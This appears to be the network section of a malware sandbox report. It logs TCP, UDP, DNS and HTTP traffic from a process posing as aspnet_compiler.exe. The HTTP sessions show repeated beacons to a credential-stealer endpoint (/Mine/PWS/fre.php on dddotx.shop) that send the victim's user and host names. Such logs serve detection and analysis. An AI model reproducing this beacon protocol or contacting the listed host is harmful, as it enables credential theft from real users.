Sep 25, 2024 15:30:24.337969065 CEST	55989	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:24.343002081 CEST	80	55989	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:24.343240023 CEST	55989	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:24.345341921 CEST	55989	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:24.350214958 CEST	80	55989	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:24.350366116 CEST	55989	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:24.355207920 CEST	80	55989	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:25.134206057 CEST	80	55989	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:25.134380102 CEST	55989	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:25.135917902 CEST	80	55989	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:25.136003017 CEST	55989	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:25.139379025 CEST	80	55989	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:25.278228045 CEST	55990	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:25.283240080 CEST	80	55990	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:25.283344984 CEST	55990	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:25.285468102 CEST	55990	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:25.290340900 CEST	80	55990	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:25.290427923 CEST	55990	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:25.295272112 CEST	80	55990	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:26.009540081 CEST	80	55990	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:26.009752035 CEST	55990	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:26.009915113 CEST	80	55990	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:26.009969950 CEST	55990	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:26.014599085 CEST	80	55990	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:26.153695107 CEST	55991	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:26.160137892 CEST	80	55991	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:26.160242081 CEST	55991	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:26.163558960 CEST	55991	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:26.169898987 CEST	80	55991	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:26.169979095 CEST	55991	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:26.174781084 CEST	80	55991	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:26.831254005 CEST	80	55991	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:26.831403017 CEST	55991	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:26.832192898 CEST	80	55991	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:26.832254887 CEST	55991	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:26.836287022 CEST	80	55991	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:26.988715887 CEST	55992	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:26.993736029 CEST	80	55992	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:26.993880987 CEST	55992	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:26.995888948 CEST	55992	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:27.001055956 CEST	80	55992	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:27.001128912 CEST	55992	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:27.006150007 CEST	80	55992	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:27.737901926 CEST	80	55992	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:27.738070965 CEST	55992	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:27.738923073 CEST	80	55992	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:27.738979101 CEST	55992	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:27.742914915 CEST	80	55992	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:27.886835098 CEST	55993	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:27.892074108 CEST	80	55993	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:27.892175913 CEST	55993	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:27.894305944 CEST	55993	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:27.899205923 CEST	80	55993	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:27.899264097 CEST	55993	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:27.904031992 CEST	80	55993	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:28.608217955 CEST	80	55993	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:28.608408928 CEST	55993	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:28.608480930 CEST	80	55993	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:28.608531952 CEST	55993	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:28.613287926 CEST	80	55993	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:28.741399050 CEST	55994	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:28.746436119 CEST	80	55994	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:28.746531963 CEST	55994	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:28.748756886 CEST	55994	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:28.753787041 CEST	80	55994	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:28.753856897 CEST	55994	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:28.758718014 CEST	80	55994	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:29.440074921 CEST	80	55994	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:29.440171003 CEST	80	55994	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:29.440258026 CEST	55994	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:29.440295935 CEST	55994	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:29.447187901 CEST	80	55994	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:29.599030018 CEST	55995	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:29.607183933 CEST	80	55995	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:29.607436895 CEST	55995	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:29.609441042 CEST	55995	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:29.617997885 CEST	80	55995	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:29.618077993 CEST	55995	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:29.623727083 CEST	80	55995	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:30.271070004 CEST	80	55995	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:30.271297932 CEST	55995	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:30.271567106 CEST	80	55995	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:30.271632910 CEST	55995	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:30.276618004 CEST	80	55995	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:30.416717052 CEST	55996	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:30.421694994 CEST	80	55996	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:30.421776056 CEST	55996	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:30.423810005 CEST	55996	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:30.428625107 CEST	80	55996	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:30.428677082 CEST	55996	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:30.433685064 CEST	80	55996	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:31.121346951 CEST	80	55996	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:31.121473074 CEST	55996	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:31.122096062 CEST	80	55996	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:31.122148037 CEST	55996	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:31.126338005 CEST	80	55996	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:31.260112047 CEST	55997	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:31.265669107 CEST	80	55997	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:31.265773058 CEST	55997	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:31.267951965 CEST	55997	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:31.272900105 CEST	80	55997	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:31.273027897 CEST	55997	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:31.277909040 CEST	80	55997	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:31.982772112 CEST	80	55997	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:31.982949018 CEST	55997	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:31.983717918 CEST	80	55997	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:31.983771086 CEST	55997	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:31.987763882 CEST	80	55997	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:32.119256020 CEST	55998	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:32.126650095 CEST	80	55998	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:32.126734018 CEST	55998	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:32.128866911 CEST	55998	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:32.135504007 CEST	80	55998	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:32.135559082 CEST	55998	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:32.140319109 CEST	80	55998	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:32.891236067 CEST	80	55998	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:32.891448021 CEST	55998	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:32.892426014 CEST	80	55998	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:32.892501116 CEST	55998	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:32.896265984 CEST	80	55998	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:33.039958954 CEST	55999	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:33.212762117 CEST	80	55999	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:33.212939024 CEST	55999	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:33.250965118 CEST	55999	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:33.255919933 CEST	80	55999	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:33.256021976 CEST	55999	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:33.260803938 CEST	80	55999	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:33.916858912 CEST	80	55999	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:33.917047024 CEST	55999	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:33.917727947 CEST	80	55999	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:33.917788029 CEST	55999	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:33.921905994 CEST	80	55999	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:34.061343908 CEST	56000	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:34.066286087 CEST	80	56000	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:34.066389084 CEST	56000	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:34.068444014 CEST	56000	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:34.073287010 CEST	80	56000	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:34.073487997 CEST	56000	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:34.078353882 CEST	80	56000	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:35.635847092 CEST	80	56000	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:35.635879040 CEST	80	56000	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:35.635894060 CEST	80	56000	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:35.635958910 CEST	56000	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:35.635989904 CEST	56000	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:35.636066914 CEST	56000	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:35.637883902 CEST	80	56000	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:35.637940884 CEST	56000	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:35.638684988 CEST	80	56000	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:35.639128923 CEST	56000	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:35.642303944 CEST	80	56000	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:35.789169073 CEST	56001	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:35.794101954 CEST	80	56001	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:35.794209957 CEST	56001	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:35.796345949 CEST	56001	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:35.801126957 CEST	80	56001	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:35.801198006 CEST	56001	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:35.805986881 CEST	80	56001	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:36.512485981 CEST	80	56001	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:36.512574911 CEST	56001	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:36.514772892 CEST	80	56001	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:36.514822006 CEST	56001	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:36.517407894 CEST	80	56001	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:36.746464968 CEST	56002	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:37.756983042 CEST	56002	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:37.762015104 CEST	80	56002	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:37.762140036 CEST	56002	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:37.765178919 CEST	56002	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:37.766448021 CEST	80	56002	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:37.766503096 CEST	56002	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:37.771471977 CEST	80	56002	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:37.771542072 CEST	56002	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:37.776333094 CEST	80	56002	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:38.532172918 CEST	80	56002	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:38.532636881 CEST	80	56002	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:38.532749891 CEST	56002	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:38.532751083 CEST	56002	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:38.539438009 CEST	80	56002	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:38.694626093 CEST	56003	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:38.701363087 CEST	80	56003	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:38.703809977 CEST	56003	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:38.703809977 CEST	56003	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:38.710664034 CEST	80	56003	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:38.713861942 CEST	56003	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:38.720715046 CEST	80	56003	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:39.444228888 CEST	80	56003	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:39.444328070 CEST	56003	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:39.445180893 CEST	80	56003	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:39.445242882 CEST	56003	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:39.450411081 CEST	80	56003	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:39.582847118 CEST	56004	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:39.587601900 CEST	80	56004	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:39.587675095 CEST	56004	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:39.589740038 CEST	56004	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:39.594510078 CEST	80	56004	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:39.594556093 CEST	56004	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:39.599339962 CEST	80	56004	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:40.283212900 CEST	80	56004	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:40.283415079 CEST	56004	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:40.283788919 CEST	80	56004	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:40.283848047 CEST	56004	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:40.288332939 CEST	80	56004	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:40.419676065 CEST	56005	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:40.425071001 CEST	80	56005	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:40.425192118 CEST	56005	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:40.427402973 CEST	56005	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:40.433042049 CEST	80	56005	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:40.433960915 CEST	56005	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:40.440399885 CEST	80	56005	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:41.170823097 CEST	80	56005	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:41.170973063 CEST	56005	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:41.171663046 CEST	80	56005	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:41.171722889 CEST	56005	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:41.175888062 CEST	80	56005	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:41.400917053 CEST	56006	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:41.405771017 CEST	80	56006	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:41.405868053 CEST	56006	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:41.407851934 CEST	56006	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:41.412801981 CEST	80	56006	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:41.413983107 CEST	56006	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:41.418786049 CEST	80	56006	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:42.063430071 CEST	80	56006	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:42.064240932 CEST	80	56006	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:42.064291000 CEST	56006	80	192.168.2.4	188.114.96.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 15:28:36.779702902 CEST	52127	53	192.168.2.4	1.1.1.1
Sep 25, 2024 15:28:36.791651011 CEST	53	52127	1.1.1.1	192.168.2.4
Sep 25, 2024 15:28:51.014931917 CEST	53	55508	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 25, 2024 15:28:36.779702902 CEST	192.168.2.4	1.1.1.1	0xaf8b	Standard query (0)	dddotx.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 25, 2024 15:28:36.791651011 CEST	1.1.1.1	192.168.2.4	0xaf8b	No error (0)	dddotx.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 25, 2024 15:28:36.791651011 CEST	1.1.1.1	192.168.2.4	0xaf8b	No error (0)	dddotx.shop		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dddotx.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:36.803759098 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 176 Connection: close
Sep 25, 2024 15:28:36.808752060 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones134349JONES-PCk0FDD42EE188E931437F4FBE2CRF9Rb
Sep 25, 2024 15:28:37.469983101 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mzrtz%2FQF0X2cAeLlFJWI2z%2BAeAdP1etxRyi%2Fzh69K%2FYSgYngPgGa4HNOw3eP1bgcepWOE%2BAKIl7reduOnaGLl4kk%2BWu3IHn%2FRDQW%2F3lSf2wT5MlXhnwD0xHzrx7DBQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5bc08ddb0ca4-EWR Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:37.782362938 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 176 Connection: close
Sep 25, 2024 15:28:37.787247896 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones134349JONES-PC+0FDD42EE188E931437F4FBE2CatoE1
Sep 25, 2024 15:28:38.475661993 CEST	561	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m0XsUX3XgZvqZ8dvRLyh0Tae%2BF6G3vfbq6VSoRrdPb6EqohVU517Rv1BktkQ7gY3zOf4LhB%2FtQuwg%2BBYmu0agYCehTM%2BigkcgrqvlaA3agc92h259U8bZQb8hziMMg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5bc6b9f342fc-EWR Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:38.544929028 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:38.549981117 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:39.240874052 CEST	579	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5jmRWxvk%2FF%2B7m4F%2FOz1%2BVZYTqYewi9mxwwac1inb6YETltLvovYwz16ZsOGQb9ASpQXM9YTXCCFy%2BzSVe%2F7e%2B71D%2F6iHxEBmGTURdOh%2FWvWN7G4b7RVlOtp2jfoOBw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5bcb6815438b-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:39.417495012 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:39.422339916 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:40.175534010 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2FZfHpw5R3M0J12EljDtdW1ytxJT89wzT5CdW7RKt6Pno0EKM%2FCMU0gLB0HcmhNzqoCPVWec6tz725TyuijPkjNt5PPh%2FvNMO%2BvQt1%2BfH5yUXyGLca5TBaoFjvceLg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5bd0ed438cd4-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:40.329387903 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
